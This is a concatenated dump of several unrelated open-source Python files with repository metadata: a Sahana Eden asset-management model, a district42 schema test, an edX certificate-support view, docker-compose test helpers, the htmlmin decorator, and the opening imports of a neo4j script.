"TELEPHONE" : ASSET_TYPE_TELEPHONE,
"OTHER" : ASSET_TYPE_OTHER,
}
ASSET_LOG_SET_BASE = 1
ASSET_LOG_ASSIGN = 2
ASSET_LOG_RETURN = 3
ASSET_LOG_CHECK = 4
ASSET_LOG_REPAIR = 5
ASSET_LOG_DONATED = 32
ASSET_LOG_LOST = 33
ASSET_LOG_STOLEN = 34
ASSET_LOG_DESTROY = 35
# To pass to global scope
asset_log_status = {
"SET_BASE" : ASSET_LOG_SET_BASE,
"ASSIGN" : ASSET_LOG_ASSIGN,
"RETURN" : ASSET_LOG_RETURN,
"CHECK" : ASSET_LOG_CHECK,
"REPAIR" : ASSET_LOG_REPAIR,
"DONATED" : ASSET_LOG_DONATED,
"LOST" : ASSET_LOG_LOST,
"STOLEN" : ASSET_LOG_STOLEN,
"DESTROY" : ASSET_LOG_DESTROY,
}
#SITE = 1
#LOCATION = 2
# =============================================================================
class S3AssetModel(S3Model):
"""
Asset Management
"""
names = ["asset_asset",
"asset_log",
"asset_log_prep",
"asset_asset_id",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
request = current.request
s3 = current.response.s3
settings = current.deployment_settings
currency_type = s3.currency_type
person_id = self.pr_person_id
location_id = self.gis_location_id
organisation_id = self.org_organisation_id
organisation_represent = self.org_organisation_represent
site_id = self.org_site_id
room_id = self.org_room_id
item_id = self.supply_item_entity_id
supply_item_id = self.supply_item_id
supply_item_represent = self.supply_item_represent
#supplier_id = self.proc_supplier_id
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
vehicle = settings.has_module("vehicle")
s3_date_format = settings.get_L10n_date_format()
s3_date_represent = lambda dt: S3DateTime.date_represent(dt, utc=True)
# Shortcuts
add_component = self.add_component
comments = s3.comments
configure = self.configure
crud_strings = s3.crud_strings
define_table = self.define_table
meta_fields = s3.meta_fields
super_link = self.super_link
#--------------------------------------------------------------------------
# Assets
#
asset_type_opts = { ASSET_TYPE_VEHICLE : T("Vehicle"),
#ASSET_TYPE_RADIO : T("Radio"),
#ASSET_TYPE_TELEPHONE : T("Telephone"),
ASSET_TYPE_OTHER : T("Other")
}
asset_item_represent = lambda id: supply_item_represent(id,
show_um = False)
ctable = self.supply_item_category
itable = self.supply_item
tablename = "asset_asset"
table = define_table(tablename,
super_link("track_id", "sit_trackable"),
super_link("doc_id", "doc_entity"),
Field("number",
label = T("Asset Number")),
item_id,
supply_item_id(represent = asset_item_represent,
requires = IS_ONE_OF(db((ctable.can_be_asset == True) & \
(itable.item_category_id == ctable.id)),
"supply_item.id",
asset_item_represent,
sort=True,
),
script = None, # No Item Pack Filter
),
# @ToDo: Can we set this automatically based on Item Category?
Field("type", "integer",
readable = vehicle,
writable = vehicle,
requires = IS_IN_SET(asset_type_opts),
default = ASSET_TYPE_OTHER,
represent = lambda opt: \
asset_type_opts.get(opt, UNKNOWN_OPT),
label = T("Type")),
Field("sn",
label = T("Serial Number")),
# @ToDo: Switch to using proc_supplier
#supplier_id(),
Field("supplier",
label = T("Supplier")),
Field("purchase_date", "date",
label = T("Purchase Date"),
requires = IS_NULL_OR(IS_DATE(format = s3_date_format)),
represent = s3_date_represent,
widget = S3DateWidget()),
Field("purchase_price", "double",
default=0.00,
represent=lambda v, row=None: IS_FLOAT_AMOUNT.represent(v, precision=2)),
currency_type("purchase_currency"),
# Base Location, which should always be a Site & set via Log
location_id(readable=False,
writable=False),
# Populated onaccept of the log to make a component tab
person_id("assigned_to_id",
readable=False,
writable=False,
comment=self.pr_person_comment(child="assigned_to_id")),
comments(),
*(s3.address_fields() + meta_fields()))
# CRUD strings
ADD_ASSET = T("Add Asset")
LIST_ASSET = T("List Assets")
crud_strings[tablename] = Storage(
title_create = ADD_ASSET,
title_display = T("Asset Details"),
title_list = LIST_ASSET,
title_update = T("Edit Asset"),
title_search = T("Search Assets"),
title_upload = T("Import Assets"),
subtitle_create = T("Add New Asset"),
subtitle_list = T("Assets"),
label_list_button = LIST_ASSET,
label_create_button = ADD_ASSET,
label_delete_button = T("Delete Asset"),
msg_record_created = T("Asset added"),
msg_record_modified = T("Asset updated"),
msg_record_deleted = T("Asset deleted"),
msg_list_empty = T("No Assets currently registered"))
# Reusable Field
asset_id = S3ReusableField("asset_id", db.asset_asset,
sortby="number",
requires = IS_NULL_OR(IS_ONE_OF(db,
"asset_asset.id",
self.asset_represent,
sort=True)),
represent = self.asset_represent,
label = T("Asset"),
ondelete = "CASCADE")
table.virtualfields.append(AssetVirtualFields())
# Search Method
asset_search = S3Search(
# Advanced Search only
advanced=(
S3SearchSimpleWidget(
name="asset_search_text",
label=T("Search"),
comment=T("You can search by asset number, item description or comments. You may use % as wildcard. Press 'Search' without input to list all assets."),
field=[
"number",
"item_id$name",
#"item_id$category_id$name",
"comments",
]
),
S3SearchLocationHierarchyWidget(
name="asset_search_L1",
field="L1",
cols = 3
),
S3SearchLocationHierarchyWidget(
name="asset_search_L2",
field="L2",
cols = 3
),
S3SearchLocationWidget(
name="asset_search_map",
label=T("Map"),
),
S3SearchOptionsWidget(
name="asset_search_item_category",
field=["item_id$item_category_id"],
label=T("Category"),
cols = 3
),
))
hierarchy = current.gis.get_location_hierarchy()
report_fields = [
"number",
(T("Category"), "item_id$item_category_id"),
(T("Item"), "item_id"),
(T("Facility/Site"), "site"),
(hierarchy["L1"], "L1"),
(hierarchy["L2"], "L2"),
]
# Resource Configuration
configure(tablename,
super_entity=("supply_item_entity", "sit_trackable"),
search_method = asset_search,
report_filter=[
S3SearchLocationHierarchyWidget(
name="asset_search_L1",
field="L1",
cols = 3
),
S3SearchLocationHierarchyWidget(
name="asset_search_L2",
field="L2",
cols = 3
),
S3SearchOptionsWidget(
name="asset_search_item_category",
field=["item_id$item_category_id"],
label=T("Category"),
cols = 3
),
],
report_rows = report_fields,
report_cols = report_fields,
report_fact = report_fields,
report_method=["count", "list"],
list_fields=["id",
"number",
"item_id$item_category_id",
"item_id",
"type",
"purchase_date",
#"organisation_id",
"location_id",
"L0",
"L1",
#"L2",
#"L3",
"comments"
])
# Log as component of Assets
add_component("asset_log", asset_asset="asset_id")
# Vehicles as component of Assets
add_component("vehicle_vehicle",
asset_asset=dict(joinby="asset_id",
multiple=False))
# GPS as a component of Assets
add_component("vehicle_gps", asset_asset="asset_id")
# =====================================================================
# Asset Log
#
asset_log_status_opts = {ASSET_LOG_SET_BASE : T("Base Facility/Site Set"),
ASSET_LOG_ASSIGN : T("Assigned"),
ASSET_LOG_RETURN : T("Returned"),
ASSET_LOG_CHECK : T("Checked"),
ASSET_LOG_REPAIR : T("Repaired"),
ASSET_LOG_DONATED : T("Donated"),
ASSET_LOG_LOST : T("Lost"),
ASSET_LOG_STOLEN : T("Stolen"),
ASSET_LOG_DESTROY : T("Destroyed"),
}
#site_or_location_opts = {SITE :T("Site"),
# LOCATION :T("Location")}
asset_condition_opts = {
1:T("Good Condition"),
2:T("Minor Damage"),
3:T("Major Damage"),
4:T("Un-Repairable"),
5:T("Needs Maintenance"),
}
tablename = "asset_log"
table = define_table(tablename,
asset_id(),
Field("status",
"integer",
label = T("Status"),
requires = IS_IN_SET(asset_log_status_opts),
represent = lambda opt: \
asset_log_status_opts.get(opt, UNKNOWN_OPT)
),
Field("datetime",
"datetime",
label = T("Date"),
default=request.utcnow,
requires = IS_EMPTY_OR(IS_UTC_DATETIME()),
widget = S3DateTimeWidget(),
represent = s3_date_represent,
),
Field("datetime_until",
"datetime",
label = T("Date Until"),
requires = IS_EMPTY_OR(IS_UTC_DATETIME()),
widget = S3DateTimeWidget(),
represent = s3_date_represent,
),
person_id(label = T("Assigned To")),
Field("check_in_to_person",
"boolean",
#label = T("Mobile"), # Relabel?
label = T("Track with this Person?"),
comment = DIV(_class="tooltip",
#_title="%s|%s" % (T("Mobile"),
_title="%s|%s" % (T("Track with this Person?"),
T("If selected, then this Asset's Location will be updated whenever the Person's Location is updated."))),
readable = False,
writable = False),
organisation_id(), # This is the Organisation to whom the loan is made
#Field("site_or_location",
# "integer",
# requires = IS_NULL_OR(IS_IN_SET(site_or_location_opts)),
# represent = lambda opt: \
# site_or_location_opts.get(opt, UNKNOWN_OPT),
# widget = RadioWidget.widget,
# label = T("Facility or Location")),
site_id,
room_id(),
#location_id(),
Field("cancel", #
"boolean",
default = False,
label = T("Cancel Log Entry"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Cancel Log Entry"),
T("'Cancel' will indicate an asset log entry did not occur")))
),
Field("cond", "integer", # condition is a MySQL reserved word
requires = IS_IN_SET(asset_condition_opts,
zero = "%s..." % T("Please select")),
represent = lambda opt: \
asset_condition_opts.get(opt, UNKNOWN_OPT),
label = T("Condition")),
person_id("by_person_id",
label = T("Assigned By"), # This can either be the Asset controller if signed-out from the store
default = auth.s3_logged_in_person(), # or the previous owner if passed on directly (e.g. to successor in their post)
comment = self.pr_person_comment(child="by_person_id"),
),
comments(),
*meta_fields())
table.site_id.label = T("Facility/Site")
table.site_id.readable = True
table.site_id.writable = True
table.site_id.widget = None
table.site_id.label = T("Facility/Site")
table.site_id.comment = (DIV(_class="tooltip",
_title="%s|%s" % (T("Facility/Site"),
T("Enter some characters to bring up a list of possible matches")),
),
SCRIPT("""
$(document).ready(function() {
S3FilterFieldChange({
'FilterField': 'organisation_id',
'Field': 'site_id',
'FieldPrefix': 'org',
'FieldResource': 'site',
'FieldID' : 'site_id',
});
});""")
)
# CRUD strings
ADD_ASSIGN = T("New Asset Log Entry") # Change Label?
LIST_ASSIGN = T("Asset Log")
crud_strings[tablename] = Storage(
title_create = ADD_ASSIGN,
title_display = T("Asset Log Details"),
title_list = LIST_ASSIGN,
title_update = T("Edit Asset Log Entry"),
title_search = T("Search Asset Log"),
subtitle_create = ADD_ASSIGN,
subtitle_list = T("Asset Log"),
label_list_button = LIST_ASSIGN,
label_create_button = ADD_ASSIGN,
label_delete_button = T("Delete Asset Log Entry"),
msg_record_created = T("Asset Log Entry created"), # Change Label?
msg_record_modified = T("Asset Log Entry updated"),
msg_record_deleted = T("Asset Log Entry deleted"),
msg_list_empty = T("Asset Log Empty"))
# Resource configuration
configure(tablename,
onvalidation = self.asset_log_onvalidation,
onaccept = self.asset_log_onaccept,
listadd = False,
list_fields = ["id",
"status",
"datetime",
"datetime_until",
"organisation_id",
#"site_or_location",
"site_id",
"room_id",
#"location_id",
"cancel",
"cond",
"comments"]
)
# ---------------------------------------------------------------------
# Pass variables back to global scope (response.s3.*)
#
return Storage(
asset_asset_id = asset_id,
asset_rheader = asset_rheader,
asset_represent = self.asset_represent,
asset_log_prep = self.asset_log_prep,
)
# -------------------------------------------------------------------------
@staticmethod
def defaults():
""" Return safe defaults for names in case the model is disabled """
asset_id = S3ReusableField("asset_id", "integer",
writable=False,
readable=False)
return Storage(asset_asset_id=asset_id)
# -------------------------------------------------------------------------
@staticmethod
def asset_represent(id):
"""
"""
db = current.db
s3db = current.s3db
messages = current.messages
NONE = messages.NONE
table = s3db.asset_asset
itable = s3db.supply_item
btable = s3db.supply_brand
query = (table.id == id) & \
(itable.id == table.item_id)
r = db(query).select(table.number,
itable.name,
btable.name,
left = btable.on(itable.brand_id == btable.id),
limitby=(0, 1)).first()
if r:
represent = "%s (%s" % (r.asset_asset.number,
r.supply_item.name)
if r.supply_brand.name:
represent = "%s, %s)" % (represent,
r.supply_brand.name)
else:
represent = "%s)" % represent
else:
represent = NONE
return represent
# -------------------------------------------------------------------------
@staticmethod
def asset_log_onvalidation(form):
"""
"""
request = current.request
s3 = current.response.s3
status = int(request.post_vars.get("status", 0))
type = request.get_vars.get("type", None)
#if status == asset_log_status["ASSIGN"] and type == "organisation":
# Site or Location is required
# if not form.vars.site_id and not form.vars.location_id:
# response.error = T("The asset must be assigned to a site OR location.")
# form.errors.site_or_location = T("Please enter a site OR a location")
# -------------------------------------------------------------------------
@staticmethod
def asset_log_onaccept(form):
"""
"""
db = current.db
s3db = current.s3db
request = current.request
s3 = current.response.s3
tracker = S3Tracker()
ltable = s3db.asset_log
vars = form.vars
query = (ltable.id == vars.id)
asset_id = db(query).select(ltable.asset_id,
limitby=(0, 1)).first().asset_id
current_log = asset_get_current_log(asset_id)
status = int(vars.status or request.vars.status)
request.get_vars.pop("status", None)
type = request.get_vars.pop("type", None)
vars.datetime = vars.datetime.replace(tzinfo=None)
if vars.datetime and \
(not current_log.datetime or \
current_log.datetime <= vars.datetime):
# This is a current assignment
atable = s3db.asset_asset
asset_tracker = tracker(atable, asset_id)
if status == ASSET_LOG_SET_BASE:
# Set Base Location
asset_tracker.set_base_location(tracker(s3db.org_site,
vars.site_id))
# Populate the address fields
s3.address_update(atable, asset_id)
if status == ASSET_LOG_ASSIGN:
if type == "person":#
if vars.check_in_to_person:
asset_tracker.check_in(s3db.pr_person, vars.person_id,
timestmp = vars.datetime)
else:
asset_tracker.set_location(vars.person_id,
timestmp = vars.datetime)
# Update main record for component
query = (atable.id == asset_id)
db(query).update(assigned_to_id=vars.person_id)
elif type == "site":
asset_tracker.check_in(s3db.org_site, vars.site_id,
timestmp = vars.datetime)
elif type == "organisation":
#if vars.site_or_location == SITE:
asset_tracker.check_in(s3db.org_site, vars.site_id,
timestmp = vars.datetime)
#if vars.site_or_location == LOCATION:
# asset_tracker.set_location(vars.location_id,
# timestmp = vars.datetime)
if status == ASSET_LOG_RETURN:
# Set location to base location
asset_tracker.set_location(asset_tracker,
timestmp = vars.datetime)
return
# -------------------------------------------------------------------------
@staticmethod
def asset_log_prep(r):
"""
Called by Controller
"""
T = current.T
db = current.db
s3db = current.s3db
request = current.request
s3 = current.response.s3
table = s3db.asset_log
if r.record:
asset = Storage(r.record)
else:
# This is a new record
asset = Storage()
table.cancel.readable = False
table.cancel.writable = False
# This causes an error with the dataTables paginate
# if used only in r.interactive & not also r.representation=="aadata"
if r.method != "read" and r.method != "update":
table.cancel.readable = False
table.cancel.writable = False
current_log = asset_get_current_log(asset.id)
if request.vars.status:
status = int(request.vars.status)
else:
status = 0
if status and status != "None":
field = table.status
field.default = status
field.readable = False
field.writable = False
elif current_log:
table.status.default = current_log.status
crud_strings = s3.crud_strings.asset_log
if status == ASSET_LOG_SET_BASE:
crud_strings.subtitle_create = T("Set Base Facility/Site")
crud_strings.msg_record_created = T("Base Facility/Site Set")
table.by_person_id.label = T("Set By")
table.site_id.writable = True
table.site_id.requires = IS_ONE_OF(db, "org_site.id",
table.site_id.represent)
table.datetime_until.readable = False
table.datetime_until.writable = False
table.person_id.readable = False
table.person_id.writable = False
#table.site_or_location.readable = False
#table.site_or_location.writable = False
#table.location_id.readable = False
#table.location_id.writable = False
elif status == ASSET_LOG_RETURN:
crud_strings.subtitle_create = T("Return")
crud_strings.msg_record_created = T("Returned")
table.person_id.label = T("Returned From")
table.person_id.default = current_log.person_id
#table.site_or_location.readable = False
#table.site_or_location.writable = False
table.site_id.readable = False
table.site_id.writable = False
#table.location_id.readable = False
#table.location_id.writable = False
elif status == ASSET_LOG_ASSIGN:
type = request.vars.type
# table["%s_id" % type].required = True
if type == "person":#
crud_strings.subtitle_create = T("Assign to Person")
crud_strings.msg_record_created = T("Assigned to Person")
table["person_id"].requires = IS_ONE_OF(db, "pr_person.id",
table.person_id.represent,
orderby="pr_person.first_name",
sort=True,
error_message="Person must be specified!")
table.check_in_to_person.readable = True
table.check_in_to_person.writable = True
elif type == "site":
crud_strings.subtitle_create = T("Assign to Facility/Site")
crud_strings.msg_record_created = T("Assigned to Facility/Site")
table["site_id"].requires = IS_ONE_OF(db, "org_site.site_id",
table.site_id.represent)
#field = table.site_or_location
#field.readable = False
#field.writable = False
#field.default = SITE
#table.location_id.readable = False
#table.location_id.writable = False
elif type == "organisation":
crud_strings.subtitle_create = T("Assign to Organization")
crud_strings.msg_record_created = T("Assigned to Organization")
table["organisation_id"].requires = IS_ONE_OF(db, "org_organisation.id",
table.organisation_id.represent,
orderby="org_organisation.name",
sort=True)
#table.site_or_location.required = True
elif "status" in request.get_vars:
crud_strings.subtitle_create = T("Update Status")
crud_strings.msg_record_created = T("Status Updated")
table.person_id.label = T("Updated By")
field = table.status
field.readable = True
field.writable = True
field.requires = IS_IN_SET({ASSET_LOG_CHECK : T("Check"),
ASSET_LOG_REPAIR : T("Repair"),
ASSET_LOG_DONATED : T("Donated"),
ASSET_LOG_LOST : T("Lost"),
ASSET_LOG_STOLEN : T("Stolen"),
ASSET_LOG_DESTROY : T("Destroyed"),
})
# =============================================================================
def asset_get_current_log(asset_id):
"""
"""
db = current.db
s3db = current.s3db
table = s3db.asset_log
query = ( table.asset_id == asset_id ) & \
( table.cancel == False ) & \
( table.deleted == False )
# Get the log with the maximum time
asset_log = db(query).select(table.id,
table.status,
table.datetime,
table.cond,
table.person_id,
table.site_id,
#table.location_id,
orderby = ~table.datetime,
limitby=(0, 1)).first()
if asset_log:
return Storage(datetime = asset_log.datetime,
person_id = asset_log.person_id,
cond = int(asset_log.cond or 0),
status = int(asset_log.status or 0),
site_id = asset_log.site_id,
#location_id = asset_log.location_id
)
else:
return Storage()
# =============================================================================
def asset_rheader(r):
""" Resource Header for Assets """
if r.representation == "html":
record = r.record
if record:
T = current.T
s3db = current.s3db
s3 = current.response.s3
NONE = current.messages.NONE
if record.type == ASSET_TYPE_VEHICLE:
tabs = [(T("Asset Details"), None),
(T("Vehicle Details"), "vehicle"),
(T("GPS Data"), "gps")]
else:
tabs = [(T("Edit Details"), None)]
#elif record.type == s3.asset.ASSET_TYPE_RADIO:
# tabs.append((T("Radio Details"), "radio"))
#elif record.type == s3.asset.ASSET_TYPE_TELEPHONE:
# tabs.append((T("Telephone Details"), "phone"))
tabs.append((T("Log"), "log"))
tabs.append((T("Documents"), "document"))
rheader_tabs = s3_rheader_tabs(r, tabs)
if current.request.controller == "vehicle":
func = "vehicle"
else:
func = "asset"
# @ToDo: Check permissions before displaying buttons
asset_action_btns = [ A( T("Set Base Facility/Site"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = dict(status = ASSET_LOG_SET_BASE)
),
_class = "action-btn"
)
]
current_log = asset_get_current_log(record.id)
status = current_log.status
if record.location_id:
# A Base Site has been set
if status == ASSET_LOG_ASSIGN:
asset_action_btns += [ A( T("Return"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = dict(status = ASSET_LOG_RETURN)
),
_class = "action-btn"
)
]
if status < ASSET_LOG_DONATED:
# @ToDo: deployment setting to prevent assigning assets before returning them
# The Asset is available for assignment (not disposed)
asset_action_btns += [ A( T("Assign to Person"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = dict(status = ASSET_LOG_ASSIGN,
type = "person")
),
_class = "action-btn"
),
A( T("Assign to Facility/Site"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = dict(status = ASSET_LOG_ASSIGN,
type = "site")
),
_class = "action-btn"
),
A( T("Assign to Organization"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = dict(status = ASSET_LOG_ASSIGN,
type = "organisation")
),
_class = "action-btn"
),
]
asset_action_btns += [ A( T("Update Status"),
_href = URL(f=func,
args = [record.id, "log", "create"],
vars = None
),
_class = "action-btn"
),
]
table = r.table
ltable = s3db.asset_log
rheader = DIV(TABLE(TR( TH("%s: " % table.number.label),
record.number,
TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id)
),
TR( TH("%s: " % ltable.cond.label),
ltable.cond.represent(current_log.cond),
TH("%s: " % ltable.status.label),
ltable.status.represent(status),
),
TR( TH("%s: " % ltable.person_id.label),
ltable.person_id.represent(current_log.person_id),
TH("%s: " % ltable.site_id.label),
ltable.site_id.represent(current_log.site_id),
#TH("%s: " % ltable.location_id.label),
# ltable.location_id.represent(current_log.location_id),
),
),
DIV(_style = "margin-top:5px;",
*asset_action_btns
),
rheader_tabs
)
return rheader
return None
# =============================================================================
class AssetVirtualFields:
""" Virtual fields as dimension classes for reports """
def site(self):
# The site of the asset
try:
location_id = self.asset_asset.location_id
except AttributeError:
# not available
location_id = None
if location_id:
s3db = current.s3db
stable = s3db.org_site
query = (stable.location_id == location_id)
site = current.db(query).select(stable.name,
stable.site_id,
stable.instance_type,
limitby=(0, 1)).first()
if site:
return s3db.org_site_represent(site, link=False)
return current.messages.NONE
# END =========================================================================
|
flavour/iscram
|
modules/eden/asset.py
|
Python
|
mit
| 41,981
|
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
with given:
sch = schema.dict
with when:
res = sch.keys()
with then:
assert res == KeysView([])
def test_dict_keys():
with given:
sch = schema.dict({
"id": schema.int,
"name": schema.str,
optional("email"): schema.str,
})
with when:
res = sch.keys()
with then:
assert res == KeysView(["id", "name", "email"])
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572
|
"""
Certificate end-points used by the student support UI.
See lms/djangoapps/support for more details.
"""
import logging
import urllib
from functools import wraps
import bleach
from django.db import transaction
from django.db.models import Q
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError
from django.utils.translation import gettext as _
from django.views.decorators.http import require_GET, require_POST
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import CourseEnrollment, User
from common.djangoapps.util.json_request import JsonResponse
from lms.djangoapps.certificates.api import generate_certificate_task, get_certificates_for_user
from lms.djangoapps.certificates.permissions import GENERATE_ALL_CERTIFICATES, VIEW_ALL_CERTIFICATES
from lms.djangoapps.instructor_task.api import generate_certificates_for_students
from openedx.core.djangoapps.content.course_overviews.api import get_course_overview_or_none
log = logging.getLogger(__name__)
def require_certificate_permission(permission):
"""
View decorator that requires permission to view and regenerate certificates.
"""
def inner(func):
"""
The outer wrapper, used to allow the decorator to take optional arguments.
"""
@wraps(func)
def wrapper(request, *args, **kwargs):
"""
The inner wrapper, which wraps the view function.
"""
if request.user.has_perm(permission, 'global'):
return func(request, *args, **kwargs)
return HttpResponseForbidden()
return wrapper
return inner
@require_GET
@require_certificate_permission(VIEW_ALL_CERTIFICATES)
def search_certificates(request):
"""
Search for certificates for a particular user OR along with the given course.
Supports search by either username or email address along with course id.
First filter the records for the given username/email and then filter against the given course id (if given).
Show the 'Regenerate' button if a record found in 'generatedcertificate' model otherwise it will show the Generate
button.
Arguments:
request (HttpRequest): The request object.
Returns:
JsonResponse
Example Usage:
GET /certificates/search?user=bob@example.com
GET /certificates/search?user=bob@example.com&course_id=xyz
Response: 200 OK
Content-Type: application/json
[
{
"username": "bob",
"course_key": "edX/DemoX/Demo_Course",
"type": "verified",
"status": "downloadable",
"download_url": "http://www.example.com/cert.pdf",
"grade": "0.98",
"created": 2015-07-31T00:00:00Z,
"modified": 2015-07-31T00:00:00Z
}
]
"""
unbleached_filter = urllib.parse.unquote(urllib.parse.quote_plus(request.GET.get("user", "")))
user_filter = bleach.clean(unbleached_filter)
if not user_filter:
msg = _("user is not given.")
return HttpResponseBadRequest(msg)
try:
user = User.objects.get(Q(email=user_filter) | Q(username=user_filter))
except User.DoesNotExist:
return HttpResponseBadRequest(_("user '{user}' does not exist").format(user=user_filter))
certificates = get_certificates_for_user(user.username)
for cert in certificates:
cert["course_key"] = str(cert["course_key"])
cert["created"] = cert["created"].isoformat()
cert["modified"] = cert["modified"].isoformat()
cert["regenerate"] = not cert['is_pdf_certificate']
course_id = urllib.parse.quote_plus(request.GET.get("course_id", ""), safe=':/')
if course_id:
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course id '{course_id}' is not valid").format(course_id=course_id))
else:
course_overview = get_course_overview_or_none(course_key)
if not course_overview:
msg = _("The course does not exist against the given key '{course_key}'").format(course_key=course_key)
return HttpResponseBadRequest(msg)
certificates = [certificate for certificate in certificates
if certificate['course_key'] == course_id]
if not certificates:
return JsonResponse([{'username': user.username, 'course_key': course_id, 'regenerate': False}])
return JsonResponse(certificates)
def _validate_post_params(params):
"""
Validate request POST parameters to the generate and regenerate certificates end-point.
Arguments:
params (QueryDict): Request parameters.
Returns: tuple of (dict, HttpResponse)
"""
# Validate the username
try:
username = params.get("username")
user = User.objects.get(username=username)
except User.DoesNotExist:
msg = _("User {username} does not exist").format(username=username)
return None, HttpResponseBadRequest(msg)
# Validate the course key
try:
course_key = CourseKey.from_string(params.get("course_key"))
except InvalidKeyError:
msg = _("{course_key} is not a valid course key").format(course_key=params.get("course_key"))
return None, HttpResponseBadRequest(msg)
return {"user": user, "course_key": course_key}, None
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@require_POST
@require_certificate_permission(GENERATE_ALL_CERTIFICATES)
def regenerate_certificate_for_user(request):
"""
Regenerate certificates for a user.
This is meant to be used by support staff through the UI in lms/djangoapps/support
Arguments:
request (HttpRequest): The request object
Returns:
HttpResponse
Example Usage:
POST /certificates/regenerate
* username: "bob"
* course_key: "edX/DemoX/Demo_Course"
Response: 200 OK
"""
# Check the POST parameters, returning a 400 response if they're not valid.
params, response = _validate_post_params(request.POST)
if response is not None:
return response
user = params["user"]
course_key = params["course_key"]
course_overview = get_course_overview_or_none(course_key)
if not course_overview:
msg = _("The course {course_key} does not exist").format(course_key=course_key)
return HttpResponseBadRequest(msg)
# Check that the user is enrolled in the course
if not CourseEnrollment.is_enrolled(user, course_key):
msg = _("User {user_id} is not enrolled in the course {course_key}").format(
user_id=user.id,
course_key=course_key
)
return HttpResponseBadRequest(msg)
# Attempt to regenerate certificates
try:
generate_certificate_task(user, course_key)
except: # pylint: disable=bare-except
# We are pessimistic about the kinds of errors that might get thrown by the
# certificates API. This may be overkill, but we're logging everything so we can
# track down unexpected errors.
log.exception(f"Could not regenerate certificate for user {user.id} in course {course_key}")
return HttpResponseServerError(_("An unexpected error occurred while regenerating certificates."))
log.info(
f"Started regenerating certificates for user {user.id} in course {course_key} from the support page."
)
return HttpResponse(200)
@transaction.non_atomic_requests
@require_POST
@require_certificate_permission(GENERATE_ALL_CERTIFICATES)
def generate_certificate_for_user(request):
"""
Generate certificates for a user.
This is meant to be used by support staff through the UI in lms/djangoapps/support
Arguments:
request (HttpRequest): The request object
Returns:
HttpResponse
Example Usage:
POST /certificates/generate
* username: "bob"
* course_key: "edX/DemoX/Demo_Course"
Response: 200 OK
"""
# Check the POST parameters, returning a 400 response if they're not valid.
params, response = _validate_post_params(request.POST)
if response is not None:
return response
course_overview = get_course_overview_or_none(params["course_key"])
if not course_overview:
msg = _("The course {course_key} does not exist").format(course_key=params["course_key"])
return HttpResponseBadRequest(msg)
# Check that the user is enrolled in the course
if not CourseEnrollment.is_enrolled(params["user"], params["course_key"]):
msg = _("User {username} is not enrolled in the course {course_key}").format(
username=params["user"].username,
course_key=params["course_key"]
)
return HttpResponseBadRequest(msg)
# Attempt to generate certificate
generate_certificates_for_students(
request,
params["course_key"],
student_set="specific_student",
specific_student_id=params["user"].id
)
return HttpResponse(200)
|
eduNEXT/edx-platform
|
lms/djangoapps/certificates/views/support.py
|
Python
|
agpl-3.0
| 9,360
|
from __future__ import absolute_import
from __future__ import unicode_literals
from compose.config.config import ConfigDetails
from compose.config.config import ConfigFile
from compose.config.config import load
def build_config(contents, **kwargs):
return load(build_config_details(contents, **kwargs))
def build_config_details(contents, working_dir='working_dir', filename='filename.yml'):
return ConfigDetails(
working_dir,
[ConfigFile(filename, contents)],
)
|
andrewgee/compose
|
tests/helpers.py
|
Python
|
apache-2.0
| 495
|
"""
Copyright (c) 2013, Dave Mankoff
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Dave Mankoff nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL DAVE MANKOFF BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from .main import Minifier
def htmlmin(*args, **kwargs):
"""Minifies HTML that is returned by a function.
A simple decorator that minifies the HTML output of any function that it
decorates. It supports all the same options that :class:`htmlmin.minify` has.
With no options, it uses ``minify``'s default settings::
@htmlmin
def foobar():
return ' minify me! '
or::
@htmlmin(remove_comments=True)
def foobar():
return ' minify me! <!-- and remove me! -->'
"""
def _decorator(fn):
minify = Minifier(**kwargs).minify
def wrapper(*a, **kw):
return minify(fn(*a, **kw))
return wrapper
if len(args) == 1:
if callable(args[0]) and not kwargs:
return _decorator(args[0])
else:
raise RuntimeError(
'htmlmin decorator does accept positional arguments')
elif len(args) > 1:
raise RuntimeError(
'htmlmin decorator does accept positional arguments')
else:
return _decorator
|
mankyd/htmlmin
|
htmlmin/decorator.py
|
Python
|
bsd-3-clause
| 2,502
|
from __future__ import print_function
from neo4j.v1 import GraphDatabase, basic_auth
import os, sys
import json
import pickle
import ipdb
